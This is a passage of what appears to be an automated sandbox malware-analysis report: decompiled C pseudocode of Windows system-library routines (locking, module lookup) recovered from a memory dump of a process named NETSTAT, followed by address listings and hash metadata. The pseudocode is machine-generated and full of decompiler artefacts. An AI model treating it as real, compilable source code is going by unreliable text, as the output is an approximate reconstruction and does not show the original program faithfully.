				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x3448714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E03382EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E03382EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E033558EC(_t240);
									_t221 =  *0x3445cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x3445cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03394A2C(0x3446e40, 0x3394b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03377D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3335c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0338F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0338F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E033D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03372400(_t267 + 0x20);
															}
															L03372400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03382397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03372280(_t134, 0x3448608);
									__eflags =  *0x3446e48 - _t253; // 0xb38880
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0336FFB0(_t198, _t241, 0x3448608);
										__eflags = _t253;
										if(_t253 != 0) {
											L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3446e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3448608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03386B90(_t210,  &_v64);
										_t262 =  *0x3448608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0338E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E033997C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0339006A(0x3448608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3448608);
												E0339B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3446904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3446e48; // 0xb38880
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0336FFB0(_t198, _t240, 0x3448608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E033900C2(0x3448608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                0x033820a0
                0x033820a8
                0x033820ad
                0x033820b3
                0x033820b8
                0x033820c2
                0x033820c7
                0x033820cb
                0x033820d2
                0x03382263
                0x03382266
                0x033c5836
                0x033c5836
                0x00000000
                0x0338226c
                0x0338226c
                0x03382270
                0x03382274
                0x033820e2
                0x033820e2
                0x033820e6
                0x033820ee
                0x033c57dc
                0x033c57de
                0x033c57ec
                0x033c57ec
                0x033c57f1
                0x033c57f3
                0x033c57f8
                0x00000000
                0x033c57f8
                0x033c57e0
                0x033c57e4
                0x033c57ea
                0x00000000
                0x00000000
                0x00000000
                0x033c57ea
                0x033820f4
                0x033820f4
                0x033820f8
                0x033820f8
                0x033820fc
                0x03382100
                0x03382106
                0x03382201
                0x03382206
                0x0338220b
                0x0338220e
                0x033822a9
                0x033822ac
                0x00000000
                0x00000000
                0x033822b2
                0x033822b5
                0x033c5801
                0x033c5806
                0x00000000
                0x00000000
                0x033c5810
                0x033c5815
                0x033c5818
                0x00000000
                0x00000000
                0x033c581e
                0x033822bb
                0x033822bb
                0x03382218
                0x03382218
                0x0338221c
                0x03382220
                0x03382222
                0x033822c2
                0x033822c4
                0x033822dc
                0x033822dc
                0x033822e1
                0x00000000
                0x00000000
                0x00000000
                0x033822e7
                0x033822c8
                0x033822cd
                0x033822d3
                0x033822d6
                0x033c5823
                0x033c5825
                0x033c5827
                0x00000000
                0x00000000
                0x033c582d
                0x00000000
                0x033c582d
                0x00000000
                0x03382228
                0x03382228
                0x00000000
                0x03382228
                0x03382222
                0x03382214
                0x03382214
                0x00000000
                0x03382114
                0x03382114
                0x03382114
                0x0338211a
                0x0338211c
                0x03382348
                0x0338234d
                0x033c5840
                0x033c5845
                0x033c5848
                0x033c584e
                0x033c584e
                0x033c5848
                0x03382353
                0x03382355
                0x03382388
                0x03382388
                0x03382368
                0x0338236a
                0x0338236c
                0x0338238f
                0x00000000
                0x0338236e
                0x0338236e
                0x0338218e
                0x0338218e
                0x03382191
                0x03382195
                0x033c5a03
                0x033c5a06
                0x033c5a0c
                0x033c5a0f
                0x033c5a11
                0x033c5a13
                0x033c5a13
                0x033c5a19
                0x033c5a1f
                0x00000000
                0x0338219b
                0x0338219b
                0x033821a0
                0x03382282
                0x03382284
                0x03382284
                0x03382284
                0x03382284
                0x033821a6
                0x033821a9
                0x033821ac
                0x033821ae
                0x033821b3
                0x0338228b
                0x03382290
                0x03382379
                0x03382296
                0x03382298
                0x03382298
                0x03382290
                0x033821b9
                0x033821be
                0x033822a2
                0x033822a2
                0x033821c4
                0x033821c8
                0x033821cc
                0x033821d0
                0x033821d4
                0x033821de
                0x033821e3
                0x033c5a29
                0x033c5a2c
                0x00000000
                0x00000000
                0x033c5a3b
                0x00000000
                0x033821e9
                0x033821e9
                0x033821e9
                0x033821ee
                0x033821f1
                0x033c5a45
                0x033c5a4b
                0x033c5a52
                0x033c5a58
                0x033c5a5d
                0x033c5a5f
                0x033c5a71
                0x033c5a61
                0x033c5a6a
                0x033c5a6a
                0x033c5a76
                0x033c5a79
                0x033c5a7f
                0x033c5a83
                0x033c5a85
                0x033c5a87
                0x033c5a87
                0x033c5a8c
                0x033c5a91
                0x033c5a97
                0x033c5a9f
                0x033c5aa0
                0x033c5aa1
                0x033c5aa6
                0x033c5aab
                0x033c5ab1
                0x033c5ab3
                0x033c5ab9
                0x033c5aca
                0x033c5ad4
                0x033c5ad4
                0x033c5ade
                0x033c5ade
                0x033c5aab
                0x033c5a79
                0x033c5a52
                0x033821f7
                0x033821f9
                0x033821fe
                0x033821fe
                0x033821e3
                0x03382195
                0x0338236c
                0x03382122
                0x03382122
                0x03382124
                0x03382231
                0x03382236
                0x03382236
                0x03382238
                0x03382238
                0x03382240
                0x03382242
                0x03382244
                0x033c59fc
                0x0338218c
                0x0338218c
                0x00000000
                0x0338218c
                0x0338224a
                0x0338224f
                0x03382256
                0x03382304
                0x03382309
                0x0338230f
                0x0338231e
                0x0338231e
                0x0338231e
                0x03382320
                0x03382325
                0x0338232a
                0x0338232c
                0x0338233e
                0x0338233e
                0x00000000
                0x0338232c
                0x03382311
                0x03382317
                0x0338231a
                0x0338231c
                0x03382380
                0x03382380
                0x03382380
                0x03382384
                0x00000000
                0x00000000
                0x03382386
                0x00000000
                0x0338231c
                0x0338225c
                0x0338225c
                0x00000000
                0x0338225c
                0x0338212a
                0x03382134
                0x03382138
                0x0338213d
                0x033c5858
                0x033c5863
                0x033c5863
                0x033c5867
                0x033c586a
                0x00000000
                0x00000000
                0x033c586c
                0x033c586c
                0x033c5871
                0x033c5875
                0x033c5877
                0x033c5997
                0x033c599c
                0x033c59a1
                0x033c59a7
                0x033c59a7
                0x00000000
                0x033c59a7
                0x033c587d
                0x00000000
                0x033c588b
                0x033c588b
                0x033c5890
                0x033c5892
                0x033c5894
                0x033c5899
                0x033c589b
                0x033c58a0
                0x033c58a0
                0x033c58aa
                0x033c58b2
                0x033c58b6
                0x033c58be
                0x033c58c6
                0x033c58c9
                0x033c590d
                0x033c5917
                0x033c591a
                0x033c591c
                0x033c5920
                0x033c5928
                0x033c592a
                0x033c592c
                0x033c592e
                0x033c592e
                0x033c58cb
                0x033c58cd
                0x033c58d8
                0x033c58e0
                0x033c58f4
                0x033c58fe
                0x033c58fe
                0x033c593a
                0x033c593e
                0x033c5940
                0x033c5942
                0x00000000
                0x033c5944
                0x033c5944
                0x033c5949
                0x033c594e
                0x033c594e
                0x033c5953
                0x033c595b
                0x033c5976
                0x033c5976
                0x033c597a
                0x033c597f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033c5981
                0x033c5981
                0x033c5981
                0x033c5983
                0x033c5988
                0x033c598d
                0x033c5991
                0x033c5991
                0x00000000
                0x033c595d
                0x033c595d
                0x033c5963
                0x033c5965
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033c5967
                0x033c5967
                0x033c596b
                0x033c596d
                0x00000000
                0x00000000
                0x033c596f
                0x033c5971
                0x033c5971
                0x033c5974
                0x00000000
                0x00000000
                0x00000000
                0x033c5974
                0x00000000
                0x033c5967
                0x033c595b
                0x033c5942
                0x033c5863
                0x03382143
                0x03382143
                0x03382149
                0x0338214f
                0x033822f1
                0x033822f6
                0x00000000
                0x03382173
                0x03382173
                0x0338217d
                0x03382181
                0x03382186
                0x033c59ae
                0x033c59b2
                0x033c59b5
                0x033c59b7
                0x033c59ba
                0x033c59cd
                0x033c59d1
                0x033c59d5
                0x033c59d9
                0x033c59db
                0x00000000
                0x00000000
                0x033c59dd
                0x033c59dd
                0x033c59e1
                0x033c59e4
                0x033c59e7
                0x033c59ee
                0x033c59ee
                0x033c59f3
                0x033c59f3
                0x00000000
                0x03382186
                0x0338214f
                0x03382106
                0x03382266
                0x033820d8
                0x033820da
                0x033820e0
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9bb0f3fb1a492e65a4705949b308d9e955cba2c9bef34c1b15a194634f83ee2a
                • Instruction ID: 3455f6be47a219c07ec2497f4e17b6af2388304f1b5102d74f928fd7f13fb474
                • Opcode Fuzzy Hash: 9bb0f3fb1a492e65a4705949b308d9e955cba2c9bef34c1b15a194634f83ee2a
                • Instruction Fuzzy Hash: 70F12935A083459FE725DF29CCC072BB7E9AF86314F18896DE899DB250D734E841CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 87%
                			E0336D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x344d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03366600(0x34452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3447b9c; // 0x0
							_t281 = L03374620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0339F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3447b90; // 0x77cf0000
								if(_t384 == 0) {
									_t353 =  *0x3447b8c; // 0xb32a08
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03372280(_t200, 0x34484d8);
									_t277 =  *0x34485f4; // 0xb33ce8
									_t351 =  *0x34485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xb33c80
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0336FFB0(_t287, _t353, 0x34484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E033ACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03366600(0x34452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03367926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x344b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E033DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3448472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x344b218; // 0x0
														asm("ror edi, cl");
														 *0x344b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03372280(_t250, 0x34484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03393898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0336FFB0(_t293, _t353, 0x34484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E033937F5(_t353, 0);
																}
																E03390413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03389B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E033802D6(_t174);
																}
																L033777F0( *0x3447b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0338C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0336EC7F(_t353);
										L033819B8(_t287, 0, _t353, 0);
										_t200 = E0335F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0339B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x344b2f8; // 0x1190000
									if((_t206 |  *0x344b2fc) == 0 || ( *0x344b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x344b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E03406B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E03406AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
